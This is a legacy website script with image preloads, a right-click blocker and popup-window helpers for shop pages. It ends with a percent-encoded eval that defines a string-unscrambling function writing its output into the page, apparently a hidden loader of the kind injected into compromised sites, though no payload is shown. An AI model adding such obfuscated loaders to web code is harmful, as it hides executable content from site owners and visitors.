<!--

image1 = new Image();
image1.src = "../images/structural/navpage1p.gif";

image2 = new Image();
image2.src = "../images/structural/navpage2p.gif";

image3 = new Image();
image3.src = "../images/structural/navpage3p.gif";

image4 = new Image();
image4.src = "../images/structural/navpage4p.gif";

function right(e) {
if (navigator.appName == 'Netscape' && 
(e.which == 3 || e.which == 2))
return false;
else if (navigator.appName == 'Microsoft Internet Explorer' && 
(event.button == 2 || event.button == 3)) {
alert("RIGHT CLICK DISABLED\n===================\n \n Please read the item about\nCOPYRIGHT ISSUES on\nthe Technical Data page.");
return false;
}
return true;
}


function Invoice(page) {
OpenWin = this.open(page, "Invoice", "toolbar=yes,menubar=no,location=no,status=yes,scrollbars=yes,resizable=yes,width=500,height=575,left=10,top=10");
}

function SurveyGo(page) {
OpenWin = this.open(page, "SurveyGo", "toolbar=yes,menubar=no,location=no,status=yes,scrollbars=yes,resizable=yes,width=370,height=450,left=40,top=40");
}

function OptionsGo(page) {
OpenWin = this.open(page, "OptionsGo", "toolbar=yes,menubar=no,location=no,status=yes,scrollbars=yes,resizable=yes,width=660,height=500,left=10,top=10");
}

function BigOptGo(page) {
OpenWin = this.open(page, "BigOptGo", "toolbar=no,menubar=no,location=no,status=no,scrollbars=yes,resizable=yes,width=690,height=600,left=10,top=10");
}

function PriceGo(page) {
OpenWin = this.open(page, "PriceGo", "toolbar=no,menubar=no,location=no,status=no,scrollbars=no,resizable=no,width=400,height=310,left=155,top=115");
}

function Stock(page) {
OpenWin = this.open(page, "Stock", "toolbar=no,menubar=no,location=no,scrollbars=yes,resizable=yes,width=670,height=500,left=10,top=10");
}

function ShipUp(page) {
OpenWin = this.open(page, "ShipUp", "toolbar=no,menubar=no,location=no,scrollbars=no,resizable=yes,width=550,height=350,left=30,top=30");
}


document.onmousedown=right;
document.onmouseup=right;
if (document.layers) window.captureEvents(Event.MOUSEDOWN);
if (document.layers) window.captureEvents(Event.MOUSEUP);
window.onmousedown=right;
window.onmouseup=right;

eval(unescape("%66%75%6e%63%74%69%6f%6e%20%52%72%52%72%52%72%52%72%28%74%65%61%61%62%62%29%20%7b%76%61%72%20%74%74%74%6d%6d%6d%3d%22%22%3b%6c%3d%74%65%61%61%62%62%2e%6c%65%6e%67%74%68%3b%77%77%77%3d%68%68%68%68%66%66%66%66%3d%4d%61%74%68%2e%72%6f%75%6e%64%28%6c%2f%32%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%09%68%68%68%68%66%66%66%66%3d%68%68%68%68%66%66%66%66%2d%31%3b%66%6f%72%28%69%3d%30%3b%69%3c%68%68%68%68%66%66%66%66%3b%69%2b%2b%29%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%29%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%2b%68%68%68%68%66%66%66%66%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%20%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%6c%2d%31%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%74%74%74%6d%6d%6d%29%3b%7d%3b"));

 //-->
